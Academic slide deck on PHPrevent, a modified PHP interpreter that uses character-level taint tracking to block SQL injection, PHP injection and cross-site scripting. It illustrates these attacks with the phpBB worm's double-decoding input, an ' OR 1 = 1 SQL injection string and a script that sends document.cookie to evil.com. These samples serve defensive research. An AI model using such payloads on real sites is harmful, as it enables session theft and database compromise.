Automatically Hardening Web Applications Using Precise Tainting

Anh Nguyen-Tuong
Salvatore Guarnieri
Doug Greene
Jeff Shirley
David Evans
University of Virginia
phpBB Worm
• December 21, 2004
• Over 40,000 sites defaced
• PHP injection
• Loads Perl scripts to spread itself
• Uses Google to search for other phpBB sites
phpBB Vulnerability
$words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
...
$highlight_match[] = ... $words[$i] ...;
...
... preg_replace(... $highlight_match ...)
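Original user input: '_%2527_attack
User input after PHP fills $HTTP_GET_VARS (one automatic URL decode, quotes escaped): \'_%27_attack
User input after the explicit urldecode call: \'_'_attack
The second decode turns %27 into a quote that is no longer escaped.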
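The decoding chain above can be reproduced in a few lines. This is a minimal sketch, not phpBB's code: `simulate_get_var` is a hypothetical stand-in for what PHP does when it fills `$HTTP_GET_VARS`, and `addslashes` stands in for magic quotes, which is an assumption about the server configuration.

```php
<?php
// Hypothetical stand-in for PHP filling $HTTP_GET_VARS: one automatic
// URL decode, then quote escaping (addslashes stands in for magic quotes).
function simulate_get_var(string $raw): string
{
    return addslashes(urldecode($raw));
}

$raw = "'_%2527_attack";                  // what the attacker sends
$afterGet = simulate_get_var($raw);       // %25 decodes to %, the leading quote is escaped
$afterUrldecode = urldecode($afterGet);   // second decode turns %27 into a bare quote

echo $raw, "\n", $afterGet, "\n", $afterUrldecode, "\n";
```

The escaping happens between the two decodes, so the quote produced by the second decode is never escaped.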
Classes of Attacks
• Code injection
– Cause user provided data to be executed
while data is being processed
• PHP injection (phpBB worm)
• SQL injection
• Output generation
– Cause user provided data to be displayed to
visitors of the website: Cross Site Scripting
SQL Injection
• Attacker constructs data that injects database commands
• Example:
$res = executeQuery("SELECT real_name FROM users WHERE user = '" . $user
    . "' AND pwd = '" . $pwd . "' ");
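To make the example concrete, the sketch below builds the same query string with a benign input and with the attack input that appears later in this deck. `build_login_query` is a hypothetical helper, and `alice` and `secret` are made-up values; nothing is sent to a database.

```php
<?php
// Hypothetical helper that concatenates the query exactly as in the example above.
function build_login_query(string $user, string $pwd): string
{
    return "SELECT real_name FROM users WHERE user = '" . $user
        . "' AND pwd = '" . $pwd . "' ";
}

$benign = build_login_query('alice', 'secret');
// The attacker closes the string literal early, adds a condition that is
// always true, and comments out the rest of the statement.
$attack = build_login_query("' OR 1 = 1; -- ';", '');

echo $benign, "\n", $attack, "\n";
```

In the second query, the quote supplied by the attacker ends the literal, so `OR 1 = 1` is parsed as SQL rather than as data.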
Cross Site Scripting
• Attacker inserts user-provided data, which may include JavaScript, into a webpage
• The script executes with the permissions of the hosting website
• Simple example:
<b onmouseover= 'location.href=
"http://evil.com/steal.php?" +
document.cookie'>Hello</b>
Importance
• Over 12% of Secunia Advisories
• 4 of last 10 advisories from FrSIRT
• Cross Site Scripting and Code Injection
are responsible for many attacks on the
internet
• It is very hard to write bug-free code
Previous Approaches
• Static techniques
• Dynamic techniques before deployment
• Dynamic techniques during deployment
Static
• Static analyzers [Shanker+ 01]
• Code inspections [Fagan76]
• SQL prepared statements [Fisk04, Php05]
• Pros
– No runtime overhead
– Can be done before website is released to the public
• Cons
– Coding practices may need to change
– Inspections are only as good as the inspector
– Many false positives
Dynamic Before Deployment
• Automated Test Suites: [Huang+ 04], [Tenable05],
[Kavado05], [Offutt+ 04], [Watchfire05], [SPI05]
• Human testing
• Pros
– Coding practices do not need to change
– Attempts to simulate real world attacking conditions
• Cons
– Only tests known attacks, cannot show absence of
vulnerability
– Requires developer effort to fix security holes
Automated Dynamic: Firewalls
• Incoming [Scott, Sharp 02]
• Incoming and Outgoing [Watchfire04],
[Kavado05], [Teros04]
• Pros
– No need to modify web service
• Cons
– Only prevent recognized attacks
– Coarse policies without knowing application
semantics
Automated: Magic Quotes
• Escape all quotes supplied by a user
• Implemented in PHP and other scripting
languages
• Extremely successful
– Does not require the programmer to do anything
– Prevents many SQL injection attacks
– But prevents only a specific class of attacks
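The last point can be illustrated with a small sketch. It assumes `addslashes` as a stand-in for magic quotes, and the numeric `id` lookup is a hypothetical query that is not taken from the slides.

```php
<?php
// addslashes stands in for magic quotes, which escaped quotes in request data.
$user = addslashes("' OR 1 = 1; -- ';");
$quoted = "SELECT real_name FROM users WHERE user = '" . $user . "'";
// Both injected quotes are now escaped as \' in $quoted.

// Hypothetical numeric lookup: the value is not wrapped in quotes, so the
// attacker needs no quote character and escaping changes nothing.
$id = addslashes("0 OR 1 = 1");
$unquoted = "SELECT real_name FROM users WHERE id = " . $id;

echo $quoted, "\n", $unquoted, "\n";
```

Quote escaping helps only where the attack depends on a quote character, which is why it covers a single class of attacks.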
Previous Work Limitations
• Being precise about what constitutes an
attack is a lot of work
• Automated techniques suffer from not
exploiting the application semantics
• We want a system that works as
effortlessly as magic quotes, but prevents
a wider class of attacks
Our Approach
• Fully automated
• Aware of application semantics
• Replace PHP interpreter with a modified
interpreter that:
– Keeps track of which information comes from
untrusted sources (precise tainting)
– Checks how untrusted input is used
[Figure: PHPrevent architecture. Labels: Client, HTTP Server, Web Server, PHP Interpreter, PHPrevent, file.php, File System, Database, System APIs; steps numbered 1 through 8.]
Coarse Grain Tainting
• Provided by many scripting languages (Perl,
Ruby)
• Untrusted input is tainted
• Everything touched by tainted data becomes
tainted
$query = "SELECT real_name FROM users WHERE user = '" . $user
    . "' AND pwd = '" . $pwd . "' ";
Entire $query string is tainted
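A rough model of this behavior, assuming one taint flag per value: `CoarseValue` is a hypothetical class written for illustration and does not reflect how Perl or Ruby implement taint mode internally.

```php
<?php
// Hypothetical model of coarse-grained tainting: one flag per value.
final class CoarseValue
{
    public $text;
    public $tainted;

    public function __construct(string $text, bool $tainted)
    {
        $this->text = $text;
        $this->tainted = $tainted;
    }

    // The result is tainted as soon as either operand is tainted.
    public function concat(CoarseValue $other): CoarseValue
    {
        return new CoarseValue(
            $this->text . $other->text,
            $this->tainted || $other->tainted
        );
    }
}

$prefix = new CoarseValue("SELECT real_name FROM users WHERE user = '", false);
$user = new CoarseValue('alice', true);   // hypothetical benign input
$query = $prefix->concat($user)->concat(new CoarseValue("'", false));

var_dump($query->tainted);
```

Even with a harmless input the whole query is flagged, so a checker working from this flag cannot tell trusted SQL text from user data.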
Precise Tainting
• Untrusted input is tainted
• Taint markings are maintained at character level
– Depends on semantics of program
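• Only characters that actually derive from untrusted input are marked tainted
$query = "SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "' ";

With the attack input substituted, only the characters that came from $user are tainted:

$query = "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = '' ";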
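Character-level marking can be modeled as a string paired with one boolean per byte. The sketch below is an illustration under that assumption; `TaintedString` and its methods are hypothetical names, and the modified interpreter may store taint quite differently.

```php
<?php
// Hypothetical model of precise tainting: one boolean flag per byte.
final class TaintedString
{
    public $text;
    public $taint;   // bool[]: $taint[$i] is true when byte $i came from untrusted input

    private function __construct(string $text, array $taint)
    {
        $this->text = $text;
        $this->taint = $taint;
    }

    public static function trusted(string $s): TaintedString
    {
        return new TaintedString($s, array_fill(0, strlen($s), false));
    }

    public static function untrusted(string $s): TaintedString
    {
        return new TaintedString($s, array_fill(0, strlen($s), true));
    }

    // Concatenation keeps each operand's flags instead of merging them into one.
    public function concat(TaintedString $other): TaintedString
    {
        return new TaintedString(
            $this->text . $other->text,
            array_merge($this->taint, $other->taint)
        );
    }

    // Returns only the tainted bytes, in order.
    public function taintedBytes(): string
    {
        $out = '';
        foreach ($this->taint as $i => $flag) {
            if ($flag) {
                $out .= $this->text[$i];
            }
        }
        return $out;
    }
}

$user = "' OR 1 = 1; -- ';";
$pwd = '';
$query = TaintedString::trusted("SELECT real_name FROM users WHERE user = '")
    ->concat(TaintedString::untrusted($user))
    ->concat(TaintedString::trusted("' AND pwd = '"))
    ->concat(TaintedString::untrusted($pwd))
    ->concat(TaintedString::trusted("' "));

echo $query->taintedBytes(), "\n";
```

Because the flags survive concatenation, a later check can ask which exact characters of the final query came from the user.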
Precise Checking
• Wrappers around PHP functions that
handle updating and checking precise taint
information
• Conservative: no false negatives while
minimizing false positives
– Behavior only changes when an attack is
likely
Preventing SQL Injection
• Parse the query using the Postgres SQL
parser: identify interpreted text
• Disallow SQL keywords or delimiters in
interpreted text that is tainted
– Query is not sent to database
– Error response is returned
"SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = '' ";
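The check described above might look roughly like the following. This is a sketch under strong assumptions: a small hand-written scanner replaces the Postgres SQL parser, the keyword list is a short hypothetical sample, and `build_query` and `find_tainted_sql_syntax` are illustrative names.

```php
<?php
// Joins [text, isTainted] pairs into a query string plus one taint flag per byte.
function build_query(array $parts): array
{
    $text = '';
    $taint = [];
    foreach ($parts as $part) {
        list($s, $isTainted) = $part;
        $text .= $s;
        $taint = array_merge($taint, array_fill(0, strlen($s), $isTainted));
    }
    return [$text, $taint];
}

// Simplified stand-in for a real SQL parser. Returns a description of the first
// tainted keyword or delimiter found outside a string literal, or null if none.
function find_tainted_sql_syntax(string $query, array $taint): ?string
{
    $keywords = ['SELECT', 'FROM', 'WHERE', 'AND', 'OR', 'UNION',
                 'INSERT', 'UPDATE', 'DELETE', 'DROP'];
    $inLiteral = false;
    $n = strlen($query);
    for ($i = 0; $i < $n; $i++) {
        $c = $query[$i];
        if ($c === "'") {
            if ($inLiteral && $i + 1 < $n && $query[$i + 1] === "'") {
                $i++;       // doubled quote: an escaped quote inside the literal
                continue;
            }
            if ($taint[$i]) {
                return "tainted quote delimiter at offset $i";
            }
            $inLiteral = !$inLiteral;
            continue;
        }
        if ($inLiteral || !$taint[$i]) {
            continue;       // literal contents and trusted text are allowed
        }
        if (ctype_alpha($c)) {
            $start = $i;
            while ($i + 1 < $n && ctype_alpha($query[$i + 1])) {
                $i++;
            }
            $word = strtoupper(substr($query, $start, $i - $start + 1));
            if (in_array($word, $keywords, true)) {
                return "tainted keyword $word at offset $start";
            }
        } elseif (!ctype_digit($c) && !ctype_space($c)) {
            return "tainted delimiter '$c' at offset $i";
        }
    }
    return null;
}

$head = "SELECT real_name FROM users WHERE user = '";
list($q1, $t1) = build_query([[$head, false], ["' OR 1 = 1; -- ';", true],
    ["' AND pwd = '", false], ['', true], ["' ", false]]);
list($q2, $t2) = build_query([[$head, false], ['alice', true],
    ["' AND pwd = '", false], ['secret', true], ["' ", false]]);

$attack = find_tainted_sql_syntax($q1, $t1);
$benign = find_tainted_sql_syntax($q2, $t2);
var_dump($attack, $benign);
```

A wrapper around the database call would refuse to send the query whenever the result is not null. The scanner ignores comments, dollar quoting, and other SQL syntax, which is one reason the slides use a real parser.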
Preventing PHP Injection
• Disallow the use of tainted data in functions that treat input strings as PHP code or manipulate system state
– We place wrappers around these functions to
enforce this rule
• phpBB attack prevented by wrappers
around preg_replace
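The wrapper idea can be sketched as a guard placed in front of any function that interprets a string as code. Everything here is hypothetical: `guard_code_sink` and `has_taint` are illustrative names, taint is passed as an explicit array of per-byte flags, and the sink is a harmless closure that only records its argument.

```php
<?php
// Hypothetical helper: true when any per-byte taint flag is set.
function has_taint(array $taint): bool
{
    return in_array(true, $taint, true);
}

// Hypothetical wrapper factory: wraps a sink that would interpret its string
// argument as code and refuses to call it when that string carries taint.
function guard_code_sink(callable $sink): callable
{
    return function (string $code, array $taint) use ($sink) {
        if (has_taint($taint)) {
            throw new RuntimeException('tainted data reached a code-evaluating function');
        }
        return $sink($code);
    };
}

// Stand-in sink for the demo: it records the string instead of evaluating it.
$calls = [];
$guarded = guard_code_sink(function (string $code) use (&$calls) {
    $calls[] = $code;
    return true;
});

$guarded('1 + 1', array_fill(0, 5, false));      // trusted: passed through

$blocked = false;
try {
    $guarded('evil()', array_fill(0, 6, true));  // tainted: rejected
} catch (RuntimeException $e) {
    $blocked = true;
}
var_dump($calls, $blocked);
```

In a modified interpreter the taint flags would travel with the string itself, so the wrapped function could keep its original signature.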
Preventing Cross Site Scripting
• Wrappers around output functions
– Buffer output and then parse the tainted output with HTML Tidy
• Check the parsed HTML against a white list to ensure
there is no dangerous output
– Dangerous content was determined by examining HTML
grammar
– Sanitize it by removing tags
<b>Hello</b> → Safe
<b onmouseover= 'location.href=
"http://evil.com/steal.php?" +
document.cookie'>Hello</b> → Unsafe
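A conservative version of the whitelist check can be sketched without an HTML parser. This is an assumption-heavy illustration: the tag list is hypothetical, a regular expression replaces HTML Tidy, and the fragment passed in is assumed to be the tainted part of the output.

```php
<?php
// Hypothetical whitelist: tags accepted only in bare form, with no attributes.
const ALLOWED_TAGS = ['b', 'i', 'em', 'strong', 'p'];

// Conservative check: remove every whitelisted bare tag, then treat any
// remaining "<" as potentially dangerous markup.
function is_safe_fragment(string $html): bool
{
    $bare = '#</?(?:' . implode('|', ALLOWED_TAGS) . ')>#i';
    $rest = preg_replace($bare, '', $html);
    return strpos($rest, '<') === false;
}

// Sanitize by removing all tags when the fragment fails the check.
function sanitize_fragment(string $html): string
{
    return is_safe_fragment($html) ? $html : strip_tags($html);
}

$safe = '<b>Hello</b>';
$unsafe = "<b onmouseover= 'location.href=\"http://evil.com/steal.php?\" + document.cookie'>Hello</b>";

var_dump(is_safe_fragment($safe), is_safe_fragment($unsafe));
echo sanitize_fragment($unsafe), "\n";
```

The check errs on the side of rejection: a harmless tag that is not on the list, or a stray `<` in text, is also treated as unsafe.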
Current Status
• Modified PHP interpreter: PHPrevent
– Prevents PHP injection, SQL injection and
cross site scripting attacks
– Overly conservative: we have not specified
precise semantics for most PHP functions
• Performance
– Initial measurements indicate performance
overhead is acceptable
Future Work: Theory and Analysis
• End-to-end information flow security
• Replace ad-hoc taint marking with
principled mechanism
– Analyze data flow at interpreter level
– Infer taint specifications for PHP functions
using dynamic analysis
• Verify that taint marking in PHP
specification is consistent with interpreter
implementation
Future Work: Implementation
• Full implementation of precise tainting for
PHP APIs
• Handle persistent state
– Track tainting through database store
• Multiple tainting types with different
checking rules
• Incorporate modifications into main PHP
distribution
Summary
• Many websites are prone to attacks even
after using current methods
• Our method:
– Fully automated
– Prevents large classes of attacks
– Easy to deploy
Thank You
www.cs.virginia.edu/sammyg